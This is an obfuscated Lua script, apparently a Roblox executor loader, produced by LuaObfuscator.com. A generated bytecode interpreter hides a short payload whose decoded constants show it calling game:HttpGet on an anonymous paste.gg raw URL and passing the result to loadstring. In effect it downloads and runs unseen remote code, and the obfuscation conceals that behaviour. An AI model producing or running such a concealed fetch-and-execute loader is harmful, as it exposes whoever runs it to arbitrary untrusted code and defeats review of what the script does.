--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v88=v5(v80,v19);v19=nil;return v88;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(88 + 467 + 64)))) ;return v81-(v81%((1809 -(282 + 595)) -(857 + 74))) ;else local v82=(570 -(367 + 201))^(v32-((2565 -(1523 + 114)) -(214 + 641 + 72))) ;return (((v31%(v82 + v82))>=v82) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(1 -(0 + 0))) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(32 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (1 -0) + 2 );v18=v18 + 4 ;return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * (472 -(566 -(87 + 263)))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,181 -(67 + 113) ,15 + (8 -3) ) * ((4 -2)^(24 + 8))) + v42 ;local v46=v20(v43,83 -62 ,31);local v47=((v20(v43,(977 + 7) -(802 + 150) )==(2 -1)) and  -(1 -0)) or 1 ;if (v46==(0 + (791 -(368 + 423)))) then if (v45==(0 -0)) then return v47 * 0 ;else v46=(1016 -(10 + 8)) -(915 + 82) ;v44=0 -0 ;end elseif (v46==(7874 -5827)) then return ((v45==(0 + 0)) and (v47 * ((1 -0)/(1187 -(1069 + 118))))) or (v47 * NaN) ;end return v8(v47,v46-(2320 -1297) ) * (v44 + (v45/((3 -(443 -(416 + 26)))^(10 + (133 -91))))) ;end local function v25(v48) local v49=0 + 0 ;local v50;local v51;while true do if (v49==2) then v51={};for v89=1 -(0 + 0) , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=3;end if (v49==((1324 -(261 + 624)) -(145 + 293))) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=2 + (0 -0) ;end if (v49==(433 -(44 + 386))) then return v6(v51);end if (v49==(1486 -(998 + 488))) then v50=nil;if  not v48 then local v99=0 + 0 ;while true do if (v99==(859 -(814 + 45))) then v48=v23();if (v48==((1080 -(1020 + 60)) + 0)) then return "";end break;end end end v49=(2196 -(630 + 793)) -(201 + 571) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if ((937 -(39 + 896))==v52) then local v85=(function() return 0 -0 ;end)();while true do if (v85==0) then v59=(function() return {};end)();for v107= #"}",v58 do local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (0==v108) then local v116=(function() return 0 -0 ;end)();while true do if (v116==1) then v108=(function() return 2 -1 ;end)();break;end if (0==v116) then v109=(function() return v21();end)();v110=(function() return nil;end)();v116=(function() return 1;end)();end end end if (1==v108) then if (v109== #"}") then v110=(function() return v21()~=0 ;end)();elseif (v109==2) then v110=(function() return v24();end)();elseif (v109== #"19(") then v110=(function() return v25();end)();end v59[v107]=(function() return v110;end)();break;end end end v85=(function() return 1 + 0 ;end)();end if ((1 + 0)~=v85) then else v57[ #"-19"]=(function() return v21();end)();v52=(function() return 399 -(115 + 281) ;end)();break;end end end if (0~=v52) then else v53=(function() return function(v100,v101,v102) local v103=(function() return 0;end)();while true do if (v103~=(0 -0)) then else local v111=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v111) then v100[v101-#"[" ]=(function() return v102();end)();return v100,v101,v102;end end end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v52=(function() return 3 -2 ;end)();end if (v52==1) then local v86=(function() return 867 -(550 + 317) ;end)();local v87=(function() return;end)();while true do if (0==v86) then v87=(function() return 0 -0 ;end)();while true do if (v87~=(0 -0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v87=(function() return 286 -(134 + 151) ;end)();end if (v87==1) then v58=(function() return v23();end)();v52=(function() return 2;end)();break;end end break;end end end if (v52==(1668 -(970 + 695))) then for v91= #",",v23() do local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();while true do if (v92==(1990 -(582 + 1408))) then v93=(function() return v21();end)();if (v20(v93, #"\\", #"{")==0) then local v112=(function() return 0 -0 ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (3==v112) then if (v20(v114, #"-19", #"nil")== #"[") then v115[ #"xnxx"]=(function() return v59[v115[ #"0313"]];end)();end v54[v91]=(function() return v115;end)();break;end if (v112==(2 -0)) then if (v20(v114, #"\\", #"|")~= #"]") then else v115[2]=(function() return v59[v115[7 -5 ]];end)();end if (v20(v114,1826 -(1195 + 629) ,2)~= #"<") then else v115[ #"xxx"]=(function() return v59[v115[ #"91("]];end)();end v112=(function() return 3 -0 ;end)();end if (v112~=1) then else local v153=(function() return 241 -(187 + 54) ;end)();local v154=(function() return;end)();while true do if (v153==0) then v154=(function() return 780 -(162 + 618) ;end)();while true do if (v154==1) then v112=(function() return 2 + 0 ;end)();break;end if (v154==(0 + 0)) then local v169=(function() return 0 -0 ;end)();while true do if ((1 -0)~=v169) then else v154=(function() return 1 + 0 ;end)();break;end if (v169~=(1636 -(1373 + 263))) then else v115=(function() return {v22(),v22(),nil,nil};end)();if (v113==(1000 -(451 + 549))) then local v170=(function() return 0;end)();while true do if (0~=v170) then else v115[ #"xxx"]=(function() return v22();end)();v115[ #".com"]=(function() return v22();end)();break;end end elseif (v113== #"|") then v115[ #"-19"]=(function() return v23();end)();elseif (v113==2) then v115[ #"gha"]=(function() return v23() -((1 + 1)^(24 -8)) ;end)();elseif (v113== #"xxx") then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175~=(1384 -(746 + 638))) then else v176=(function() return 0 + 0 ;end)();while true do if (v176==(0 -0)) then v115[ #"-19"]=(function() return v23() -(2^16) ;end)();v115[ #"?id="]=(function() return v22();end)();break;end end break;end end end v169=(function() return 342 -(218 + 123) ;end)();end end end end break;end end end if (v112~=0) then else local v155=(function() return 0;end)();local v156=(function() return;end)();while true do if (0==v155) then v156=(function() return 1581 -(1535 + 46) ;end)();while true do if (1~=v156) then else v112=(function() return 1;end)();break;end if (v156==0) then v113=(function() return v20(v93,2, #"19(");end)();v114=(function() return v20(v93, #"?id=",6 + 0 );end)();v156=(function() return 1;end)();end end break;end end end end end break;end end end for v94= #" ",v23() do v55,v94,v28=(function() return v53(v55,v94,v28);end)();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[2];local v65=v60[1 + 2 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -((1 -0) + 0) ;local v75={};local v76={};for v83=0 -0 ,v74 do if ((95<=2226) and (v83>=v68)) then v72[v83-v68 ]=v73[v83 + (66 -(30 + 35)) ];else v76[v83]=v73[v83 + (1468 -(899 + 568)) ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v84=0;while true do if (v84==(0 + 0)) then v78=v66[v70];v79=v78[1];v84=2 -1 ;end if ((3540>2683) and (v84==(604 -(268 + 335)))) then if (v79<=(293 -(60 + 230))) then if (v79<=1) then if (v79>(572 -(426 + 146))) then do return;end else local v119=0 + 0 ;local v120;while true do if ((4794>=3275) and ((1456 -(282 + 1174))==v119)) then v120=v78[813 -(569 + 167 + 75) ];v76[v120]=v76[v120](v13(v76,v120 + (2 -1) ,v71));break;end end end elseif (v79==((1258 -(1043 + 214)) + 1)) then local v121=v78[1026 -(706 + 318) ];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v71=(v123 + v121) -(1252 -(721 + 530)) ;local v124=1271 -(945 + 326) ;for v157=v121,v71 do local v158=0 -0 ;while true do if (v158==(0 + 0)) then v124=v124 + (701 -(271 + 429)) ;v76[v157]=v122[v124];break;end end end else local v125;local v126,v127;local v128;local v129;v76[v78[2 + 0 ]]=v62[v78[1503 -((5323 -3915) + 92) ]];v70=v70 + (1087 -(461 + 625)) ;v78=v66[v70];v76[v78[1290 -(993 + 295) ]]=v62[v78[1 + 2 ]];v70=v70 + 1 ;v78=v66[v70];v129=v78[1173 -(418 + 753) ];v128=v76[v78[2 + (1213 -(323 + 889)) ]];v76[v129 + (2 -1) + 0 ]=v128;v76[v129]=v128[v78[2 + 2 ]];v70=v70 + 1 ;v78=v66[v70];v76[v78[1 + 1 ]]=v78[532 -(406 + 123) ];v70=v70 + (1770 -(1749 + 20)) ;v78=v66[v70];v129=v78[1 + 1 ];v126,v127=v69(v76[v129](v13(v76,v129 + ((1903 -(361 + 219)) -(1249 + (393 -(53 + 267)))) ,v78[2 + 1 + 0 ])));v71=(v127 + v129) -((1559 -(15 + 398)) -((1448 -(18 + 964)) + 679)) ;v125=0 -0 ;for v159=v129,v71 do v125=v125 + (2 -1) ;v76[v159]=v126[v125];end v70=v70 + (1901 -(106 + 1794)) ;v78=v66[v70];v129=v78[1 + 1 ];v76[v129]=v76[v129](v13(v76,v129 + 1 + 0 ,v71));v70=v70 + (2 -1) ;v78=v66[v70];v76[v78[5 -3 ]]();v70=v70 + 1 ;v78=v66[v70];do return;end end elseif (v79<=5) then if (v79>(118 -(4 + 110))) then v76[v78[586 -(57 + 527) ]]=v78[(5382 -3952) -(41 + 1386) ];else v76[v78[(61 + 44) -(17 + 86) ]]();end elseif (v79==(5 + 1)) then v76[v78[3 -1 ]]=v62[v78[8 -5 ]];else local v147=v78[(106 + 62) -(122 + 44) ];local v148=v76[v78[5 -2 ]];v76[v147 + (3 -2) ]=v148;v76[v147]=v148[v78[4 + 0 ]];end v70=v70 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403683Q00682Q7470733A2Q2F70617374652E2Q672F702F616E6F6E796D6F75732F3732363361636236302Q336234312Q643963366239663936316338632Q6439352F66696C65732F372Q63643863383533653362342Q3733613366613033353935636462353032622F72617700083Q0012033Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);